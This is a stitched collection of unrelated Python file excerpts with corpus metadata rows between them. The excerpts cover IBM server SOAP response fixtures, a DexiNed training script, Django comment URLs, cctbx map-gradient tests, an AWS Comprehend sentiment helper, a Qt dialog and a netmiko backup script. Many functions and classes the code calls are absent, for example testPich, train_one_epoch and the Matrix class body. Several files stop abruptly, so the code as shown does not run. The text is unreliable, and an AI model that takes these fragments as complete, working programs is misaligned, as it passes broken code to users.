generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope>
'''
sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope>
'''
processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope>
'''
| 621.076923 | 2,572 | 0.792172 |
fe61ee9fb03a144ec04e2fb8220326b27f35be96 | 18,786 | py | Python | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = True if platform.system()=="Linux" else False
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description='DexiNed trainer.')
parser.add_argument('--choose_test_data',
type=int,
default=3,
help='Already set the dataset for testing choice: 0 - 8')
# ----------- test -------0--
TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
test_dir = test_inf['data_dir']
is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
# Training settings
TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
train_dir = train_inf['data_dir']
# Data parameters
parser.add_argument('--input_dir',
type=str,
default=train_dir,
help='the path to the directory with the input data.')
parser.add_argument('--input_val_dir',
type=str,
default=test_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir',
type=str,
default='checkpoints',
help='the path to output the results.')
parser.add_argument('--train_data',
type=str,
choices=DATASET_NAMES,
default=TRAIN_DATA,
help='Name of the dataset.')
parser.add_argument('--test_data',
type=str,
choices=DATASET_NAMES,
default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list',
type=str,
default=test_inf['test_list'],
help='Dataset sample indices list.')
parser.add_argument('--train_list',
type=str,
default=train_inf['train_list'],
help='Dataset sample indices list.')
parser.add_argument('--is_testing',type=bool,
default=is_testing,
help='Script in testing mode.')
parser.add_argument('--double_img',
type=bool,
default=True,
help='True: use same 2 imgs changing channels') # Just for test
parser.add_argument('--resume',
type=bool,
default=False,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data',
type=str,
default='14/14_model.pth',
help='Checkpoint path from which to restore model weights from.')
parser.add_argument('--test_img_width',
type=int,
default=test_inf['img_width'],
help='Image width for testing.')
parser.add_argument('--test_img_height',
type=int,
default=test_inf['img_height'],
help='Image height for testing.')
parser.add_argument('--res_dir',
type=str,
default='result',
help='Result directory')
parser.add_argument('--log_interval_vis',
type=int,
default=50,
help='The number of batches to wait before printing test predictions.')
parser.add_argument('--epochs',
type=int,
default=22,
metavar='N',
help='Number of training epochs (default: 25).')
parser.add_argument('--lr',
default=1e-4,
type=float,
help='Initial learning rate.')
parser.add_argument('--wd',
type=float,
default=1e-4,
metavar='WD',
help='weight decay (default: 1e-4)')
# parser.add_argument('--lr_stepsize',
# default=1e4,
# type=int,
# help='Learning rate step size.')
parser.add_argument('--batch_size',
type=int,
default=8,
metavar='B',
help='the mini-batch size (default: 8)')
parser.add_argument('--workers',
default=8,
type=int,
help='The number of workers for the dataloaders.')
parser.add_argument('--tensorboard',type=bool,
default=True,
help='Use Tensorboard for logging.'),
parser.add_argument('--img_width',
type=int,
default=480,
help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
parser.add_argument('--img_height',
type=int,
default=480,
help='Image height for training.') # BIPED 400 BSDS 352
parser.add_argument('--channel_swap',
default=[2, 1, 0],
type=int)
parser.add_argument('--crop_img',
default=True,
type=bool,
help='If true crop training images, else resize images to match image width and height.')
parser.add_argument('--mean_pixel_values',
default=[103.939,116.779,123.68, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
return args
def main(args):
"""Main function."""
print(f"Number of GPU's available: {torch.cuda.device_count()}")
print(f"Pytorch version: {torch.__version__}")
# Tensorboard summary writer
tb_writer = None
training_dir = os.path.join(args.output_dir,args.train_data)
os.makedirs(training_dir,exist_ok=True)
checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
if args.tensorboard and not args.is_testing:
# from tensorboardX import SummaryWriter # previous torch version
from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
tb_writer = SummaryWriter(log_dir=training_dir)
# Get computing device
device = torch.device('cpu' if torch.cuda.device_count() == 0
else 'cuda')
# Instantiate model and move it to the computing device
model = DexiNed().to(device)
# model = nn.DataParallel(model)
ini_epoch =0
if not args.is_testing:
if args.resume:
ini_epoch=17
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
dataset_train = BipedDataset(args.input_dir,
img_width=args.img_width,
img_height=args.img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
train_mode='train',
arg=args
)
dataloader_train = DataLoader(dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers)
dataset_val = TestDataset(args.input_val_dir,
test_data=args.test_data,
img_width=args.test_img_width,
img_height=args.test_img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
test_list=args.test_list, arg=args
)
dataloader_val = DataLoader(dataset_val,
batch_size=1,
shuffle=False,
num_workers=args.workers)
# Testing
if args.is_testing:
output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
print(f"output_dir: {output_dir}")
if args.double_img:
# predict twice an image changing channels, then mix those results
testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
else:
test(checkpoint_path, dataloader_val, model, device, output_dir, args)
return
criterion = bdcn_loss2
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.wd)
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
# Main training loop
seed=1021
for epoch in range(ini_epoch,args.epochs):
if epoch%7==0:
seed = seed+1000
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
print("------ Random seed applied-------------")
# Create output directories
output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
os.makedirs(output_dir_epoch,exist_ok=True)
os.makedirs(img_test_dir,exist_ok=True)
train_one_epoch(epoch,
dataloader_train,
model,
criterion,
optimizer,
device,
args.log_interval_vis,
tb_writer,
args=args)
validate_one_epoch(epoch,
dataloader_val,
model,
device,
img_test_dir,
arg=args)
# Save model after end of every epoch
torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
args = parse_args()
main(args)
| 42.406321 | 121 | 0.524806 |
fe62800d500daa91f541e4f0b0257370caac7c78 | 5,905 | py | Python | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | null | null | null | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | null | null | null | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | 1 | 2021-09-13T12:03:37.000Z | 2021-09-13T12:03:37.000Z | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
##############################################################################
##############################################################################
| 39.366667 | 78 | 0.573412 |
fe63a253f1cf19a404c6e2b601535edfb1888800 | 657 | py | Python | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | 1 | 2018-05-29T08:43:57.000Z | 2018-05-29T08:43:57.000Z | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | null | null | null | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | 1 | 2018-08-25T01:38:12.000Z | 2018-08-25T01:38:12.000Z | from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
| 26.28 | 105 | 0.692542 |
fe6407132244604eabc2321eb05eb24333b3bd82 | 669 | py | Python | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
if __name__ == '__main__':
pass | 33.45 | 87 | 0.689088 |
fe64404bf937356d7de814318a6e0bdf49ea36b3 | 6,987 | py | Python | example/dec/dec.py | TheBurningCrusade/A_mxnet | fa2a8e3c438bea16b993e9537f75e2082d83346f | [
"Apache-2.0"
] | 159 | 2016-08-23T22:13:26.000Z | 2021-10-24T01:31:35.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 10 | 2016-08-23T05:59:07.000Z | 2018-05-24T02:31:41.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 77 | 2016-08-21T00:35:00.000Z | 2021-06-01T05:03:34.000Z | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
mnist_exp(mx.gpu(0))
| 44.788462 | 116 | 0.586232 |
fe646aafd2f602c63f8aacb84f51c78795b63990 | 7,537 | py | Python | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
if (1):
random.seed(0)
flex.set_random_seed(0)
def exercise_00():
"""
Exercise maptbx.target_and_gradients_diffmap .
"""
xrs = get_xrs()
map_data, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_data,
step = 0.3,
sites_frac = xrs.sites_frac())
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
assert approx_equal(tg.target(), 0)
assert approx_equal(list(tg.gradients()), [[0,0,0]])
xrs = xrs.translate(x=0.3, y=-0.5, z=0.7)
assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]])
map_current, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_current,
step = 0.3,
sites_frac = xrs.sites_frac())
assert tg.target() > 0
for g in tg.gradients():
for g_ in g:
assert abs(g_)>0.
def exercise_01(d_min=1.0):
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization.
"""
xrs = get_xrs()
map_target, f_calc = get_map(xrs=xrs)
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
for sx in [-1,0,1]:
for sy in [-1,0,1]:
for sz in [-1,0,1]:
xrs_cp = xrs.deep_copy_scatterers()
xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
crystal_gridding = maptbx.crystal_gridding(
unit_cell = xrs_cp.unit_cell(),
space_group_info = xrs_cp.space_group_info(),
pre_determined_n_real = map_target.accessor().all())
o = minimization.run(
xray_structure = xrs_cp,
miller_array = f_calc,
crystal_gridding = crystal_gridding,
map_target = map_target,
step = d_min/4,
target_type = "diffmap")
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization
(bigger model).
"""
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error>0.7
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
for step in [miller_array.d_min()/4]*5:
minimized = minimization.run(
xray_structure = xrs_sh,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = step,
geometry_restraints_manager = None,
target_type = "diffmap")
xrs_sh = minimized.xray_structure
map_current = minimized.map_current
final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
assert approx_equal(start_error, 0.8, 1.e-3)
assert final_error < 1.e-4
def exercise_03():
"""
Exercise maptbx.target_and_gradients_simple.
"""
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
#
t1 = maptbx.real_space_target_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
selection = flex.bool(xrs_sh.scatterers().size(), True))
g1 = maptbx.real_space_gradients_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
o = maptbx.target_and_gradients_simple(
unit_cell = xrs.unit_cell(),
map_target = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
assert approx_equal(t1, o.target())
for gi,gj in zip(g1, o.gradients()):
assert approx_equal(gi, gj)
def exercise_04():
"""
Exercise maptbx.target_and_gradients_simple in action: minimization
(bigger model).
"""
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 150)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.3)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error > 0.29
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
xrs_sh_ = xrs_sh.deep_copy_scatterers()
minimized = minimization.run(
xray_structure = xrs_sh_,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = 0.5,
geometry_restraints_manager = None,
target_type = "simple")
xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
final_error = flex.mean(xrs.distances(other = xrs_sh_))
assert final_error < 0.015
if (__name__ == "__main__"):
exercise_00()
exercise_01()
exercise_02()
exercise_03()
exercise_04()
| 36.235577 | 80 | 0.667109 |
fe66e2796ab20353c3b7dbe7a834d55cb22ebb8a | 1,212 | py | Python | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | 2 | 2022-01-17T17:22:01.000Z | 2022-01-22T13:11:33.000Z | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | null | null | null | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | null | null | null | """ LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
| 26.347826 | 89 | 0.487624 |
fe6806edfc8769087714d9060a7456450c7a5f90 | 1,608 | py | Python | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | 2 | 2022-02-05T12:15:03.000Z | 2022-03-27T09:55:51.000Z | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
| 28.714286 | 84 | 0.651741 |
fe68679524344d1cb6b9cfd2e5daf3c7c5e16099 | 1,704 | py | Python | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
"""Get sentiment.
Inspects text and returns an inference of the prevailing sentiment
(positive, neutral, mixed, or negative).
Args:
text: UTF-8 text string. Each string must contain fewer that
5,000 bytes of UTF-8 encoded characters (required | type: str).
language_code: language of text (not required | type: str |
default: 'en').
Returns:
sentiment: sentiment: positive, neutral, mixed, or negative
(type: str).
"""
comprehend = boto3.client('comprehend')
text = prepare_text(text)
try:
r = comprehend.detect_sentiment(Text=text, LanguageCode='en')
except Exception as e:
raise e
sentiment = r['Sentiment'].lower()
return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
| 32.150943 | 78 | 0.6473 |
fe68c2686760a20f5158d8a2bc5c4a835377dc27 | 6,801 | py | Python | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | 3 | 2021-07-26T00:53:24.000Z | 2021-11-17T23:23:11.000Z | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
| 44.45098 | 113 | 0.723276 |
fe6923b1aa562920cf3b40c7be4c7dd797b7d3f4 | 1,039 | py | Python | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
| 28.081081 | 86 | 0.589028 |
fe694e90c7ac984d467776f89ad0bcfbd5ee4819 | 2,131 | py | Python | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
DEFAULT_RANGE = [0, 1000]
| 41.784314 | 120 | 0.633975 |
fe6bf9a13a6fe5e608e3131b9e7d5730fd32e4d4 | 1,490 | py | Python | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | 3 | 2021-05-20T05:34:49.000Z | 2022-02-14T03:35:10.000Z | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | null | null | null | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | 2 | 2021-08-19T12:34:47.000Z | 2022-03-28T15:48:55.000Z | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Conevrt data frame from MGMT IP Address to a list
